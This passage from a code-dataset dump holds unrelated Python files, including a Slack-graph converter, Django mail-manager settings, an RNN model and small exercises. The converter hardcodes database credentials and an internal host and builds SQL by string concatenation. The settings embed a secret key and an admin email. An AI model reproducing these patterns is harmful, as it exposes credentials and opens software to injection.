string.digits)\n for _ in range(length))\n random_string = prefix + random_string\n return random_string\n\n def assertSchema(self, response_json, expected_schema):\n \"\"\"Verify response schema aligns with the expected schema.\"\"\"\n try:\n jsonschema.validate(response_json, expected_schema)\n except jsonschema.ValidationError as message:\n assert False, message\n\n @property\n def test_flavor(self):\n if self.test_config.generate_flavors:\n provider_name = self.test_config.generated_provider\n # create the flavor\n flavor_id = str(uuid.uuid1())\n self.client.create_flavor(\n flavor_id=flavor_id,\n provider_list=[{\n \"provider\": provider_name,\n \"links\": [{\"href\": \"www.{0}.com\".format(provider_name),\n \"rel\": \"provider_url\"}]}])\n else:\n flavor_id = self.test_config.default_flavor\n\n return flavor_id\n\n def setup_service(self, service_name, domain_list, origin_list,\n caching_list=[], restrictions_list=[], flavor_id=None,\n log_delivery=False):\n resp = self.client.create_service(\n service_name=service_name,\n domain_list=domain_list,\n origin_list=origin_list,\n caching_list=caching_list,\n restrictions_list=restrictions_list,\n flavor_id=flavor_id,\n log_delivery=log_delivery)\n\n self.assertEqual(resp.status_code, 202, msg=resp.text)\n self.service_location = resp.headers['location']\n self.client.wait_for_service_status(\n location=self.service_location,\n status='DEPLOYED',\n abort_on_status='FAILED',\n retry_interval=self.test_config.status_check_retry_interval,\n retry_timeout=self.test_config.status_check_retry_timeout)\n\n return resp\n\n def _service_limit_create_test_service(self, client, resp_code=False):\n service_name = str(uuid.uuid1())\n\n domain_list = [{\"domain\": self.generate_random_string(\n prefix='www.api-test-domain') + '.com'}]\n\n origin_list = [{\"origin\": self.generate_random_string(\n prefix='api-test-origin') + '.com', \"port\": 80, \"ssl\": False,\n \"hostheadertype\": \"custom\", \"hostheadervalue\":\n \"www.customweb.com\"}]\n caching_list = [\n {\n u\"name\": u\"default\",\n u\"ttl\": 3600,\n u\"rules\": [{\n u\"name\": \"default\",\n u\"request_url\": \"/*\"\n }]\n },\n {\n u\"name\": u\"home\",\n u\"ttl\": 1200,\n u\"rules\": [{\n u\"name\": u\"index\",\n u\"request_url\": u\"/index.htm\"\n }]\n }\n ]\n log_delivery = {\"enabled\": False}\n\n resp = client.create_service(\n service_name=service_name,\n domain_list=domain_list,\n origin_list=origin_list,\n caching_list=caching_list,\n flavor_id=self.flavor_id,\n log_delivery=log_delivery)\n\n if resp_code:\n return resp\n\n self.assertEqual(resp.status_code, 202)\n service_url = resp.headers[\"location\"]\n client.wait_for_service_status(\n location=service_url,\n status='DEPLOYED',\n abort_on_status='FAILED',\n retry_interval=self.test_config.status_check_retry_interval,\n retry_timeout=self.test_config.status_check_retry_timeout)\n\n return service_url\n\n def assert_patch_service_details(self, actual_response, expected_response):\n self.assertEqual(actual_response['name'],\n expected_response['name'])\n self.assertEqual(sorted(actual_response['origins']),\n sorted(expected_response['origins']))\n self.assertEqual(sorted(actual_response['caching']),\n sorted(expected_response['caching']))\n self.assertEqual(sorted(actual_response['restrictions']),\n sorted(expected_response['restrictions']))\n self.assertEqual(actual_response['flavor_id'],\n expected_response['flavor_id'])\n\n for item in actual_response['domains']:\n if item['protocol'] == 'https':\n matched_domain_in_body = next(b_item for b_item\n in expected_response['domains']\n if (\n b_item['domain'] ==\n item['domain'])\n or (b_item.get('certificate') ==\n 'shared' and\n item['domain'].split('.')[0]\n == b_item['domain']))\n if item['certificate'] == 'shared':\n matched_domain_in_body['domain'] = item['domain']\n matched_domain_in_body[\"certificate_status\"] = (\n item[\"certificate_status\"])\n self.assertEqual(sorted(actual_response['domains']),\n sorted(expected_response['domains']))\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Deletes the added resources.\"\"\"\n super(TestBase, cls).tearDownClass()\n","sub_path":"tests/api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"645122759","text":"from Database_conductor import *\ndir_path = './'\n\nimport re\nimport os\ndef remove_control_characters(html):\n def str_to_int(s, default, base=10):\n if int(s, base) < 0x10000:\n return chr(int(s, base))\n return default\n html = re.sub(u\"&#(\\d+);?\", lambda c: str_to_int(c.group(1), c.group(0)), html)\n html = re.sub(u\"&#[xX]([0-9a-fA-F]+);?\", lambda c: str_to_int(c.group(1), c.group(0), base=16), html)\n html = re.sub(u\"[\\x00-\\x08\\x0b\\x0e-\\x1f\\x7f]\", \"\", html)\n return html\n\ndef convert(team_name, channels_list, graph='mention_based_graph_info', user='read_database', pwd='FluoBySusTech',\n port=3306, host='10.20.13.209', dbname='rowdata'):\n if os.path.isfile(dir_path + \"/mention_based/{}_{}.gexf\".format(team_name, channels_list[0])):\n return\n\n from gexf import Gexf\n from textblob import TextBlob\n import random\n import pymysql\n import pandas as pd\n import networkx as nx\n\n database_conductor = Database_conductor(True)\n\n gexf_dict = dict()\n\n try:\n con = pymysql.Connect(host=host, port=port, user=user, passwd=pwd, db=dbname)\n cur = con.cursor()\n except pymysql.Error as e:\n print(\"Error %d: %s\" % (e.args[0], e.args[1]))\n\n cur.execute('select id,name from people')\n people_id = cur.fetchall()\n people_id = dict(people_id)\n\n cur.execute('select * from team_channel_relation ')\n team_to_channel = cur.fetchall()\n team_to_channel = list(map(list, zip(*team_to_channel)))\n team = team_to_channel[0][:]\n channel = team_to_channel[1][:]\n team_to_channel = {'team': team, 'channel': channel}\n team_to_channel = pd.DataFrame(team_to_channel)\n\n for channel_file in channels_list:\n\n gexf = Gexf(\"Gephi.org\", \"A Web network\")\n output = gexf.addGraph(\"directed\", \"static\", \"A Web network\")\n cur.execute('select * from people_channel_relation where channel_id = \\'' + channel_file + '\\' ')\n person_and_channel = cur.fetchall()\n\n if len(person_and_channel) == 0:\n print('1')\n gexf_dict[channel_file] = gexf\n\n else:\n\n person_and_channel = list(map(list, zip(*person_and_channel)))\n person = person_and_channel[0][:]\n channel = person_and_channel[1][:]\n person_and_channel = {'person': person, 'channel': channel}\n person_and_channel = pd.DataFrame(person_and_channel)\n del person\n del channel\n\n person_list = person_and_channel['person']\n\n # print(person_and_channel)\n\n channel_node = output.addNodeAttribute(force_id=\"Channel\", title=\"channel\", type=\"String\")\n team_node = output.addNodeAttribute(force_id=\"Team\", title=\"team\", type=\"String\")\n weight_node = output.addNodeAttribute(force_id=\"weight\", title=\"weight\", type=\"float\")\n person_set = set(person_list)\n person_to_channel = []\n for tem_person in person_set:\n cur.execute('select * from people_channel_relation where people_id = \\'' + tem_person + '\\' ')\n\n person_to_channel = person_to_channel + list(cur.fetchall())\n\n person_to_channel = list(map(list, zip(*person_to_channel)))\n person = person_to_channel[0][:]\n channel = person_to_channel[1][:]\n person_to_channel = {'person': person, 'channel': channel}\n person_to_channel = pd.DataFrame(person_to_channel)\n\n # print(person_to_channel)\n\n cc = 0\n num2333 = len(person_set)\n for tem_id in person_set:\n print(cc / num2333)\n try:\n tem_name = people_id[tem_id]\n except KeyError:\n tem_name = \"Null\"\n\n tem_channel_list = set(person_to_channel[person_to_channel['person'] == tem_id]['channel'])\n\n tmp_node = output.addNode(tem_id, tem_name)\n\n # calculdate node_weight\n node_weight = database_conductor.get_person_weight(tem_id)\n\n tmp_node.addAttribute(weight_node, str(node_weight))\n tem_team_list = set()\n for tem_channel in tem_channel_list:\n # cur.execute('select team_id from team_channel_relation where channel_id = \\'' + tem_channel + '\\'')\n # tem_team_list = cur.fetchall()\n tem_team_list = tem_team_list | set(\n team_to_channel[team_to_channel['channel'] == tem_channel]['team'])\n for tem_team in tem_team_list:\n tmp_node.addAttribute(team_node, tem_team)\n\n for tem_channel in tem_channel_list:\n tmp_node.addAttribute(channel_node, tem_channel)\n\n cc = cc + 1\n\n m = 'mention_based_graph_info'\n cur.execute('select * from ' + m + ' where channel_id = \\'' + channel_file + '\\' ')\n data = cur.fetchall()\n\n msg_att = output.addEdgeAttribute(force_id=\"Message\", title=\"message\", type='String', defaultValue='None')\n weight_att = output.addEdgeAttribute(force_id=\"Weight\", title=\"weight\", type='float', defaultValue='0')\n date_att = output.addEdgeAttribute(force_id=\"Date\", title=\"date\", type='float', defaultValue='None')\n channel_att = output.addEdgeAttribute(force_id=\"Channel\", title=\"channel\", type='String',\n defaultValue='None')\n team_att = output.addEdgeAttribute(force_id=\"Team\", title=\"team\", type='String', defaultValue='None')\n cc = 0\n numhehe = len(data)\n for tem_m in data:\n print(cc / numhehe)\n sender, receiver, text, channel_id, team_id, ts = tem_m\n blob = TextBlob(text)\n text = remove_control_characters(text)\n weight = str(blob.sentiment.polarity)\n try:\n tem_edge = output.addEdge(sender + receiver + str(cc), sender, receiver, weight=weight)\n cc = cc + 1\n tem_edge.addAttribute(msg_att, text)\n tem_edge.addAttribute(weight_att, weight)\n tem_edge.addAttribute(date_att, str(ts))\n tem_edge.addAttribute(team_att, team_id)\n tem_edge.addAttribute(channel_att, channel_id)\n except Exception:\n receiver = re.findall('\\<\\@(.*?)\\>', text)[0]\n try:\n tem_edge = output.addEdge(sender + receiver + str(cc), sender, receiver, weight=weight)\n cc = cc + 1\n\n tem_edge.addAttribute(msg_att, text)\n tem_edge.addAttribute(weight_att, weight)\n tem_edge.addAttribute(date_att, str(ts))\n tem_edge.addAttribute(team_att, team_id)\n tem_edge.addAttribute(channel_att, channel_id)\n except Exception:\n pass\n\n # print(channel_file)\n print (team_name, channel_file)\n try:\n output_file = open(dir_path + \"/mention_based/{}_{}.gexf\".format(team_name, channel_file), 'wb')\n # output_file=remove_control_characters(output_file)\n gexf.write(output_file)\n except Exception:\n print(\"Error at writing output_file\")\n\n\n # print(gexf)\n # gexf_dict[channel_file]=gexf\n # print('2')\n try:\n output_file.close()\n except Exception:\n print(\"Error at diong out put_file.close()\")\n\n return gexf_dict\n\n\n\ndatabase_conductor = Database_conductor(True)\nfrom pprint import pprint\nall_team_number = len(database_conductor.get_teams())\nfor index, team in enumerate(database_conductor.get_teams()):\n team_id = team[0]\n print('{}/{} {}'.format(index + 1, all_team_number, team[1]))\n all_channel_number = len(database_conductor.get_channels_from_team(team_id))\n for cnt, (_, channel) in enumerate((database_conductor.get_channels_from_team(team_id))):\n channel, channel_name = (database_conductor.get_channel_detail(channel)[0])\n print('\\t{}/{} {}'.format(cnt + 1, all_channel_number, channel_name))\n convert(team_id, [channel])\n\n\n\n# T024FJS4U C2H9SBGD7","sub_path":"Grapher/conventer.py","file_name":"conventer.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"142023106","text":"\"\"\"\nDjango settings for bearboa project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport sys\nimport socket\nfrom logging.handlers import SysLogHandler\n\nfrom django.conf import global_settings\n\nDEV = socket.gethostname() == 'earl'\n\nBASE_DIR = os.path.realpath(os.path.dirname(os.path.dirname(__file__)))\n\nROOT_URLCONF = 'manager/'\nLOGIN_REDIRECT_URL = '/manager/accounts/profile/'\nLOGIN_URL = '/manager/accounts/login/'\nLOGOUT_URL = '/manager/accounts/logout/'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'x=q^32&ficx1)f2uh^j)g-u8@^q07+&n5ddy3k65v$t8d590$x'\nif os.path.isfile('/var/www/modoboa/.secret_key'):\n with open('/var/www/modoboa/.secret_key') as fd:\n SECRET_KEY = fd.read().strip()\n\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = DEV\n\nTEMPLATE_DEBUG = False\n\nADMINS = [\n ('Gael', 'gpasgrimaud@bearstech.com'),\n]\n\nALLOWED_HOSTS = [\n 'mail.bearstech.com',\n 'mail.lecanardenchaine.fr',\n 'modoboa.bearstech.com',\n 'localhost',\n]\n\nSERVER_EMAIL = 'django@mail.bearstech.com'\n\nSITE_ID = 1\n\n# Password validation rules\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n {\n 'NAME': 'modoboa.core.password_validation.ComplexityValidator',\n 'OPTIONS': {\n 'upper': 1,\n 'lower': 1,\n 'digits': 1,\n 'specials': 0\n }\n },\n]\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'reversion',\n 'django_extensions',\n 'rest_framework',\n 'rest_framework.authtoken',\n)\n\n# A dedicated place to register Modoboa applications\n# Do not delete it.\n# Do not change the order.\nMODOBOA_APPS = (\n 'modoboa',\n 'modoboa.core',\n 'modoboa.lib',\n 'modoboa.admin',\n 'modoboa.relaydomains',\n 'modoboa.limits',\n 'modoboa.parameters',\n # Modoboa extensions here.\n 'modoboa_stats',\n 'modoboa_alias_pipe',\n 'modoboa_postfix_autoreply',\n)\n\nINSTALLED_APPS += MODOBOA_APPS\n\nAUTH_USER_MODEL = 'core.User'\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n 'rest_framework.authentication.SessionAuthentication',\n ),\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n )\n}\n\nMIDDLEWARE_CLASSES = (\n 'x_forwarded_for.middleware.XForwardedForMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'modoboa.core.middleware.LocalConfigMiddleware',\n 'modoboa.lib.middleware.AjaxLoginRedirect',\n 'modoboa.lib.middleware.CommonExceptionCatcher',\n 'modoboa.lib.middleware.RequestCatcherMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'modoboa.core.context_processors.top_notifications',\n ],\n 'debug': False,\n },\n },\n]\n\nROOT_URLCONF = 'bearboa.urls'\n\nWSGI_APPLICATION = 'bearboa.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nif os.path.exists('/var/www/modoboa/.my.cnf'):\n filename = '/var/www/modoboa/.my.cnf'\nelse:\n filename = '/opt/modoboa/.my.cnf'\nwith open(filename) as fd:\n for line in fd:\n if line.startswith('password'):\n MYSQL_PASSWORD = line.strip().split('=', 1)[1].strip()\n\nDATABASES = {\n \n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'modoboa',\n 'USER': 'modoboa',\n 'PASSWORD': MYSQL_PASSWORD,\n 'HOST': '127.0.0.1',\n 'PORT': '',\n 'ATOMIC_REQUESTS': True,\n 'CONN_MAX_AGE': 0,\n 'OPTIONS' : {\n \"init_command\" : 'SET foreign_key_checks = 0;',\n },\n },\n\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = DEV and '/sitestatic/' or '/manager/sitestatic/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'sitestatic')\n\nimport modoboa\nSTATICFILES_DIRS = (\n os.path.join(os.path.dirname(modoboa.__file__), 'bower_components'),\n)\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n# Modoboa settings\n#MODOBOA_CUSTOM_LOGO = os.path.join(MEDIA_URL, \"custom_logo.png\")\n\n#DOVECOT_LOOKUP_PATH = ('/path/to/dovecot', )\n\nMODOBOA_API_URL = 'http://api.modoboa.org/1/'\n\n# Logging configuration\n\nLOGGING = {\n 'version': 1,\n 'formatters': {\n 'syslog': {\n 'format': '%(name)s: %(levelname)s %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'syslog-auth': {\n 'class': 'logging.handlers.SysLogHandler',\n 'facility': SysLogHandler.LOG_AUTH,\n 'formatter': 'syslog'\n },\n 'modoboa': {\n 'class': 'modoboa.core.loggers.SQLHandler',\n },\n 'stdout': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'stream': sys.stdout,\n }\n },\n 'loggers': {\n 'modoboa.auth': {\n 'handlers': ['syslog-auth', 'modoboa'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'modoboa.admin': {\n 'handlers': ['modoboa'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'django.request': {\n 'handlers': ['mail_admins', 'stdout'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n\n}\n\ntry:\n from local_settings import *\nexcept ImportError:\n pass\n","sub_path":"bearboa/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":7783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"114200247","text":"# %load q04_count/build.py\r\n# Default Imports\r\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\r\ndata = read_data()\r\n\r\ndef deliveries_count(data = data):\r\n\r\n#print data\r\n count = 0\r\n deli = data['innings'][0]['1st innings']['deliveries']\r\n for i in deli:\r\n #print i\r\n if i.values()[0]['batsman'] == 'RT Ponting':\r\n count = count + 1\r\n return (count)\r\n\r\ndeliveries_count()\r\n","sub_path":"q04_count/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440865888","text":"'''\n\nauthor :@gvnaakhilsurya\n'''\ndef is_win_tic_tac(matrix):\n '''\nit gives the output coditions\n '''\n return_string = ''\n if matrix[0][0] == matrix[1][1] == matrix[2][2]:\n return_string = matrix[0][0]\n elif matrix[0][2] == matrix[1][1] == matrix[2][0]:\n return_string = matrix[0][2]\n elif matrix[0][0] == matrix[1][0] == matrix[2][0]:\n return_string = matrix[0][0]\n elif matrix[0][1] == matrix[1][1] == matrix[2][1]:\n return_string = matrix[0][1]\n elif matrix[0][2] == matrix[1][2] == matrix[2][2]:\n return_string = matrix[0][2]\n elif matrix[0][0] == matrix[0][1] == matrix[0][2]:\n return_string = matrix[0][0]\n elif matrix[1][0] == matrix[1][1] == matrix[1][2]:\n return_string = matrix[1][0]\n elif matrix[2][0] == matrix[2][1] == matrix[2][2]:\n return_string = matrix[2][0]\n else:\n return_string = \"invalid input\"\n return return_string\ndef is_validation(matrix):\n '''\n It checks for the condition\n '''\n tic1_list = full_string(matrix)\n if tic1_list.count('x') > 5 or tic1_list.count('o') > 5 or\\\n tic1_list.count('x') == tic1_list.count('o'):\n return \"invalid game\"\n for _ in range(len(tic1_list)):\n for j in tic1_list:\n if j not in 'ox.':\n return \"invalid input\"\n if (tic1_list.count('x') == 4 and tic1_list.count('o') == 5) or\\\n (tic1_list.count('x') == 5 and tic1_list.count('o') == 4):\n return \"draw\"\n\n return 1\ndef empty_tictac():\n '''\n # it converts the input into lists\n '''\n matrix = []\n for _ in range(3):\n list_temp = input().split()\n matrix.append(list_temp)\n return matrix\ndef full_string(matrix):\n '''\n it converts thr lists of list into string\n '''\n list_temp = []\n for i in matrix:\n list_temp.extend(i)\n return list_temp\ndef main():\n '''\n it is the main function\n '''\n inp_tic = empty_tictac()\n clean_string = full_string(inp_tic)\n output = is_validation(clean_string)\n if output == 1:\n print(is_win_tic_tac(inp_tic))\n else:\n print(output)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cspp1-pratice/m21/CodeCampTicTacToe/tictactae.py","file_name":"tictactae.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"525591900","text":"# RNN-model for predicting relational reasoning. \n# The model uses basic RNN-units.\n\n\nimport time\n\nimport collections\n\nimport numpy as np\nfrom pandas.core.common import flatten\nimport ccobra\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\n\n\n\n\n\nclass RNN(nn.Module):\n def __init__(self, input_size=40, hidden_size=64, output_size=1):\n super(RNN, self).__init__()\n \n self.n_layers = 2\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.output_size = output_size\n #Defining the layers\n # RNN Layer\n self.rnn = nn.RNN(input_size, hidden_size, self.n_layers, batch_first=True) \n # Fully connected layer\n self.fc = nn.Linear(hidden_size, output_size)\n self.sigmoid = torch.nn.Sigmoid()\n \n def forward(self, x):\n \n batch_size = x.size(0)\n\n # Initializing hidden state\n hidden = self.init_hidden(batch_size)\n\n out, hidden = self.rnn(x, hidden)\n\n #Reshaping output for the fully connected layer.\n out = out.contiguous().view(-1, self.hidden_size)\n out = self.fc(out)\n out = self.sigmoid(out)\n \n return out, hidden\n \n def init_hidden(self, batch_size):\n # This method generates the first hidden state of zeros.\n hidden = torch.zeros(self.n_layers, batch_size, self.hidden_size)\n return hidden\n\n\n\ndef getObjctMapping(task):\n objcts = []\n for i in task:\n objcts.append(i[1])\n objcts.append(i[2])\n objcts = [*{*objcts}]\n\n return dict(zip( objcts, list(range(len(objcts)))))\n\noutput_mpping = {1: True, 0: False}\n\ndef encode(task, mpping):\n result = []\n for i in task:\n premise = [0] * 5\n premise[mpping[i[1]]] = -1\n premise[mpping[i[2]]] = 1\n result.append(premise)\n return result\n\ndef getTarget(targ):\n if targ:\n return [1]\n else: \n return [0]\n\nclass RNNModel(ccobra.CCobraModel):\n def __init__(self, name='RNN', k=1):\n super(RNNModel, self).__init__(name, [\"spatial-relational\"], [\"verify\"])\n\n self.net = RNN()\n self.hidden = None\n\n\n self.n_epochs = 50\n\n self.optimizer = optim.Adam(self.net.parameters())\n self.loss = nn.BCELoss()\n\n def pre_train(self, dataset):\n torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n \n x = []\n y = []\n\n for subj_train_data in dataset:\n subj_x = []\n subj_y = []\n for seq_train_data in subj_train_data:\n task = seq_train_data['item'].task\n\n objct_mpping = getObjctMapping(task)\n\n premises = encode(task, objct_mpping)\n\n choices = encode(seq_train_data['item'].choices[0], objct_mpping)\n\n inp = list(flatten(premises)) + list(flatten(choices))\n\n target = getTarget(seq_train_data['response'])\n subj_x.append(inp)\n\n\n subj_y.append(target)\n\n x.append(subj_x)\n y.append(subj_y)\n x = np.array(x)\n y = np.array(y)\n\n self.train_x = torch.from_numpy(x).float()\n self.train_y = torch.from_numpy(y).float()\n\n\n self.train_network(self.train_x, self.train_y, self.n_epochs, verbose=True)\n\n\n\n def train_network(self, train_x, train_y, n_epochs, verbose=False):\n if verbose:\n print('Starting training...')\n\n for epoch in range(self.n_epochs):\n start_time = time.time()\n\n # Shuffle the training data\n perm_idxs = np.random.permutation(np.arange(len(train_x)))\n train_x = train_x[perm_idxs]\n train_y = train_y[perm_idxs]\n\n losses = []\n for idx in range(len(train_x)):\n cur_x = train_x[idx]\n cur_y = train_y[idx]\n\n\n inp = cur_x.view(-1, 1, 40)\n \n outputs, _ = self.net(inp)\n\n loss = self.loss(outputs, cur_y)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n losses.append(loss.item())\n\n if verbose:\n print('Epoch {}/{} ({:.2f}s): {:.4f} ({:.4f})'.format(\n epoch + 1, n_epochs, time.time() - start_time, np.mean(losses), np.std(losses)))\n\n accs = []\n for subj_idx in range(len(self.train_x)):\n pred, _ = self.net(self.train_x[subj_idx].view(-1,1,40))\n pred = pred.round()\n\n truth = self.train_y[subj_idx]\n\n\n acc = torch.mean((pred == truth).float()).item()\n accs.append(acc)\n\n print(' acc mean: {:.2f}'.format(np.mean(accs)))\n print(' acc std : {:.2f}'.format(np.std(accs)))\n\n\n self.net.eval()\n\n\n # Turns the prediction into an statement according if the given conclusion is perceived true or false. \n def predict(self, item, **kwargs):\n task = item.task\n objct_mpping = getObjctMapping(task)\n premises = encode(task, objct_mpping)\n choices = encode(item.choices[0], objct_mpping)\n x = torch.FloatTensor(list(flatten(premises)) + list(flatten(choices)))\n output, self.hidden = self.net(x.view(1, 1, -1))\n\n label = int(np.round(output.detach().numpy()[0][0]))\n\n self.prediction = output_mpping[label]\n return self.prediction\n\n","sub_path":"relational/student_projects/2020_karkkainen/models/ml/rnn/modelver.py","file_name":"modelver.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"348874382","text":"import urllib.request\n\n\ndef ipData(ip):\n with urllib.request.urlopen('http://ip-api.com/csv/{}'.format(ip)) as response:\n html = response.read()\n data = html.decode(\"utf-8\").replace(\"\\\"\", \"\").split(\",\")\n print(\"{} - - {}, {}. {}, {}\".format(data[13], data[4], data[1], data[10], data[11]))\n \nresponse = None\n\nwhile (response != \"quit\"):\n response = input(\"IP address: \")\n ipData(response)","sub_path":"ipapi.py","file_name":"ipapi.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"120415950","text":"from prune.config import data, batch_size, epoch, t_cfg, t_weight, ms\nfrom prune.config import finetune_folders as folders\nimport shutil\n\nimport os\n\ncmds = []\nfor folder in folders:\n cfg, model = \"\", \"\"\n path_ls = folder.split(\"/\")\n wdir = path_ls[1] + \"-\" + path_ls[2]\n\n files = [os.path.join(folder, f) for f in os.listdir(folder)]\n for file in files:\n if \"cfg\" in file:\n cfg = file\n elif \".pt\" in file or \".weight\" in file:\n model = file\n else:\n continue\n\n assert cfg != \"\" and model != \"\", \"Missing file in {}! (cfg or weight missed)\".format(folder)\n cmds.append(\"python train.py --wdir finetune/{}_distilled --cfg {} --weights {} --data {} --epochs {} \"\n \"--batch-size {} --multi-scale {} --t_cfg {} --t_weight {}\".format(wdir, cfg, model, data, epoch,\n batch_size, ms, t_cfg, t_weight))\n\nfor cmd in cmds:\n cmd = cmd.replace(\"--multi-scale False\", \"\")\n cmd = cmd.replace(\"--multi-scale True\", \"--multi-scale\")\n os.system(cmd)\n # print(cmd)\n","sub_path":"auto_distillation.py","file_name":"auto_distillation.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440369285","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework import routers, serializers, viewsets, status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom api import models\nfrom api.serializers import TemplateSerializer\nfrom api.system import errorcode\nfrom api.utils import make_error_response, make_succuess_response\n\nclass TemplateViewSet(viewsets.ModelViewSet):\n queryset = models.Template.objects.all()\n serializer_class = TemplateSerializer\n\n def create(self, request, *args, **kwargs):\n user = request.user\n serializer = TemplateSerializer(data={\n 'author_id': user.id,\n 'author_name': user.name,\n 'title': request.data['title'],\n 'content': request.data['content']\n })\n\n if not serializer.is_valid():\n return make_error_response(\n errorcode.CODE_10001_PARAMS_INSUFFICIENT,\n serializer.errors.values()[0][0])\n\n serializer.save()\n\n return make_succuess_response(serializer.data)\n\n def list(self, request, *args, **kwargs):\n user = request.user\n templates = models.Template.objects.filter(author_id=user.id, is_deleted=0).order_by('-create_time')\n\n return make_succuess_response(TemplateSerializer(templates, many=True).data)\n\n def destroy(self, request, *args, **kwargs):\n user = request.user\n template = self.get_object()\n\n # 只有模板的创建者才有权限删除模板\n if user.id != template.author_id:\n return make_error_response(errorcode.CODE_10202_NO_PERMISSION)\n\n template.delete()\n \n return make_succuess_response([])\n","sub_path":"src/api/viewsets/templateviewset.py","file_name":"templateviewset.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"190930341","text":"\"\"\"---ノイズをループさせて結合し、任意の時間まで長くするプログラム---\"\"\"\nimport argparse\nimport numpy as np\nimport wave\nimport os\nimport array\n\n###--- utilsディレクトリをインポートするための処理 ---###\n#import sys\n#sys.path.append('../utils')\nimport vad_utils\n\ndef get_args():\n parser = argparse.ArgumentParser(description = 'Get path of wavfiles directory')\n parser.add_argument('--input_wav', type = str, default = 'noise_elements/babble_noise.wav', help = '入力ノイズ音声ネーム')\n parser.add_argument('--output_wav', type = str, default = 'babble_noise_cocnat.wav', help = '出力ノイズ音声ネーム')\n parser.add_argument('--time', type = int, default = 